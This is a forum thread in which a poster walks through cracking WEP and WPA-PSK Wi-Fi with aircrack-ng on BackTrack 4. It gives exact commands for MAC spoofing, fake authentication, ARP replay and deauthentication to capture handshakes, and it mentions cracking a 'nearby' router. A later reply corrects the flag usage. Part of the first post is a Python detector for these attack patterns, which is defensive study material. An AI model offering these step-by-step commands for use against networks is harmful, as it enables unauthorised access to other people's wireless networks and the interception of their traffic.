
Thread: Hawking HWUG1 + External SMA Jack [WEP WORKS]

  1. #1
    Just burned his ISO
    Join Date
    May 2009
    Posts
    3

    Hawking HWUG1 + External SMA Jack [Cracking WEP/WPA WORKS]

    Hi, first post here! Just wanted to confirm that the Hawking HWUG1 works perfectly for WEP cracking in BT4 Beta running through VMWare on a Windows 7 64-bit system. Cracked a WRT54GL and a 2WIRE using WEP encryption. Purchased it from Amazon brand new for $31 with free 2-day shipping. Would highly recommend the HWUG1 to anybody looking for a great card with an SMA jack, not to mention it comes with a decent dipole antenna.
    NOTE: WPA stuff at the bottom

    ====================== WEP =====================

    The reason I'm posting this is that it is slightly different from BT3, which required the following command to work properly:
    Code:
    iwconfig rausb0 rate 1M
    This command is no longer needed (unless the router is in a different mode, but through my tests I never used this and it worked great on both routers, one in 11b mode and the other in 54g mode). Also, I noticed the device is named "rausb0", but in BT4b it's the generic "wlan0" I see in most tutorials; hence newbies have one less problem to worry about. Actually, after researching the card I tried to use rausb0 in BT4b and it wasn't working, so I tried wlan0 and it worked. Also, I was pulling my hair out because I could not understand why it wasn't working until I tried it without that command and it worked!

    Here are the exact commands I used:
    Code:
    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airodump-ng wlan0
    airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0
    No need to explain what's going on here, it's the same as any tutorial out there. So the data starts to rise slowly; in order to provoke it I had to research a bit, since nearly all guides used the -3 attack alone, which does not work well (at least for the 2 routers I tried). I kept getting a deauth/disassoc packet which stopped me from collecting data quickly. Maybe it was the routers, but what I did worked and so that's what I'm gonna go by.

    Opened up a new tab and did the following:
    Code:
    # -1: fake authentication, re-run for 6000 s; -o 1: one packet per burst; -q 10: keep-alive every 10 s
    # note: -o is a lowercase letter o, not a zero (-0 would select the deauth attack mode instead)
    aireplay-ng -1 6000 -o 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
    Okay, this command here will constantly keep us authenticated/associated for 6000 seconds (every 10 seconds), with this we don't have to worry about the deauth/disassoc packets.

    Now I opened up a 3rd tab and did the following:
    Code:
    aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
    Now go back to the 1st tab and watch the data rise quickly. I hit 60k in about 2 minutes. Then I cracked the file with success!

    As you can see the biggest problem was the deauth/disassoc packets that I kept receiving which made provoking the data impossible. Maybe it was the router, maybe it was the device, but I did this for both routers with success so anyone using the HWUG1 should try this out if they are having trouble in BT4b.
    BTW, I'm currently working on WPA-PSK cracking but I've run into some problems; will probably post about it later if I run out of ideas.

    Happy cracking!

    ===================== WPA =====================

    Just successfully cracked a WPA TKIP PSK router nearby... So I'm adding it here instead of making a new thread.
    Anyways here are the commands:
    Code:
    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airodump-ng wlan0
    airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0
    Same old, same old...

    Open up a new tab and do the following:
    Code:
    aireplay-ng -0 2 -a (BSSID) -c (client BSSID) wlan0
    also try this one in case you have trouble (actually I caught the handshake on this one but it was probably a fluke or maybe I was impatient):
    Code:
    aireplay-ng -0 5 -a (BSSID) wlan0
    Once you catch the handshake just crack it and you're good to go!
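    From the defender's side, the three aireplay-ng steps in this post each leave a distinctive pattern in monitor-mode traffic: a burst of deauth/disassoc frames for one BSSID (the -0 attack used to force a WPA handshake), a steady stream of authentication frames from one station every few seconds (the -1 fake-auth keep-alive), and a flood of equal-length data frames from one station (the replayed ARP request of the -3 attack, which has a fixed size). The script below is an added example, not code from the original post or from the aircrack-ng project; it counts those three patterns over a list of frame records. The Frame class, the MACs, the thresholds and the sample capture are all constructed for illustration; in practice you would fill the records from a pcap or a monitor-mode capture.

```python
"""Added example (not from the original thread): a small monitor-side detector
for the three aireplay-ng traffic patterns the post describes, written from the
defender's side. Frame records, MACs and thresholds are constructed."""
from collections import Counter
from dataclasses import dataclass

# 802.11 management subtypes (frame type 0)
AUTH = 0x0B
DISASSOC = 0x0A
DEAUTH = 0x0C

WINDOW = 2.0              # seconds per counting bucket (constructed)
DEAUTH_THRESHOLD = 5      # deauth/disassoc per bucket and BSSID (constructed)
REPLAY_THRESHOLD = 50     # equal-length data frames per bucket and source (constructed)
KEEPALIVE_THRESHOLD = 3   # auth frames from one station to one BSSID (constructed)


@dataclass(frozen=True)
class Frame:
    ts: float       # capture timestamp in seconds
    kind: str       # "mgmt" or "data"
    subtype: int    # management subtype; 0 for data frames
    src: str        # transmitter MAC
    bssid: str      # BSSID the frame belongs to
    length: int     # frame length in bytes


def detect(frames, window=WINDOW):
    """Return a list of (alert_kind, subject, count) tuples.

    deauth_flood:        many deauth/disassoc frames for one BSSID in one window
    arp_replay:          a burst of equal-length data frames from one station
    fake_auth_keepalive: repeated authentication frames from one station to one BSSID
    """
    deauth = Counter()
    replay = Counter()
    auth = Counter()
    for f in frames:
        bucket = int(f.ts // window)
        if f.kind == "mgmt" and f.subtype in (DEAUTH, DISASSOC):
            deauth[(bucket, f.bssid)] += 1
        elif f.kind == "mgmt" and f.subtype == AUTH:
            auth[(f.src, f.bssid)] += 1
        elif f.kind == "data":
            replay[(bucket, f.src, f.length)] += 1

    alerts = []
    for (bucket, bssid), n in sorted(deauth.items()):
        if n >= DEAUTH_THRESHOLD:
            alerts.append(("deauth_flood", bssid, n))
    for (bucket, src, length), n in sorted(replay.items()):
        if n >= REPLAY_THRESHOLD:
            alerts.append(("arp_replay", src, n))
    for (src, bssid), n in sorted(auth.items()):
        if n >= KEEPALIVE_THRESHOLD:
            alerts.append(("fake_auth_keepalive", src, n))
    return alerts


def alert_kinds(frames):
    """Just the set of alert kinds raised for a capture."""
    return {kind for kind, _, _ in detect(frames)}


# --- constructed sample capture ------------------------------------------
AP = "00:aa:bb:cc:dd:ee"        # constructed BSSID
ATTACKER = "00:11:22:33:44:55"  # the spoofed MAC used in the thread
CLIENT = "00:de:ad:be:ef:01"    # constructed legitimate client


def _sample():
    frames = [Frame(0.0, "mgmt", AUTH, CLIENT, AP, 30)]  # normal join
    # legitimate data traffic with varied frame sizes
    frames += [Frame(1.0 + i * 0.5, "data", 0, CLIENT, AP, 100 + (i * 37) % 900)
               for i in range(40)]
    # deauth burst for the BSSID: six frames within 0.3 s
    frames += [Frame(5.0 + i * 0.05, "mgmt", DEAUTH, ATTACKER, AP, 26) for i in range(6)]
    # fake-auth keep-alive: one authentication frame every 10 s
    frames += [Frame(6.0 + i * 10.0, "mgmt", AUTH, ATTACKER, AP, 30) for i in range(4)]
    # ARP replay: 80 identical 68-byte data frames inside one second
    frames += [Frame(8.0 + i * 0.01, "data", 0, ATTACKER, AP, 68) for i in range(80)]
    return frames


SAMPLE_FRAMES = _sample()
BENIGN_FRAMES = [f for f in SAMPLE_FRAMES if f.src == CLIENT]

if __name__ == "__main__":
    for alert in detect(SAMPLE_FRAMES):
        print(alert)
```

    The bucket counters are deliberately simple so the thresholds are easy to tune against your own baseline; a legitimate client reconnecting a few times or an AP kicking a single station will stay well under them, while the rates the post describes (60k data frames in about two minutes, keep-alives every 10 s) exceed them by a wide margin.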

  2. #2
    Just burned his ISO
    Join Date
    Jul 2006
    Posts
    18


    I follow you up to here. In the command below aircrack gives an error because it cannot process two attack modes. Which one did you use first,
    -1 or -0?

    Opened up a new tab and did the following:
    Code:
    aireplay-ng -1 6000 -0 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
    Okay, this command here will constantly keep us authenticated/associated for 6000 seconds (every 10 seconds), with this we don't have to worry about the deauth/disassoc packets.

    everything else works fine

  3. #3
    Just burned his ISO
    Join Date
    May 2009
    Posts
    3


    Quote Originally Posted by barecool
    I follow you up to here. In the command below aircrack gives an error because it cannot process two attack modes. Which one did you use first,
    -1 or -0?

    Opened up a new tab and did the following:
    Code:
    aireplay-ng -1 6000 -0 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
    Okay, this command here will constantly keep us authenticated/associated for 6000 seconds (every 10 seconds), with this we don't have to worry about the deauth/disassoc packets.

    everything else works fine
    Hi, I never used a -0 attack in WEP cracking. Also I did the attacks in this order:
    Opened up a new tab and did the following:
    1.
    Code:
    # -o is a lowercase letter o (packets per burst), not a zero
    aireplay-ng -1 6000 -o 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
    then open a new tab or window:
    2.
    Code:
    aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
    And I could do the attacks simultaneously (-1 and -3 attacks not -0).

    I will try to upload screenshots, give me a moment.

    edit: sorry I just noticed you must have confused WPA commands with WEP commands. You are cracking WEP from what I understand correct? You can ignore anything after the WPA line since that's for WPA only. Sorry I just edited my post to make it clear. If you are cracking WPA then just use the commands below the WPA line.

    edit2: pics (I still can't put URLs, so add an 'h' before the link and it will work)
    ttp://img38.imageshack.us/img38/7526/screenshot1i.png
    ttp://img297.imageshack.us/img297/9396/screenshot2k.png
    ttp://img14.imageshack.us/img14/3466/screenshot3fbw.png
    ttp://img529.imageshack.us/img529/4576/screenshot4g.png
    ttp://img193.imageshack.us/img193/8513/screenshot5q.png
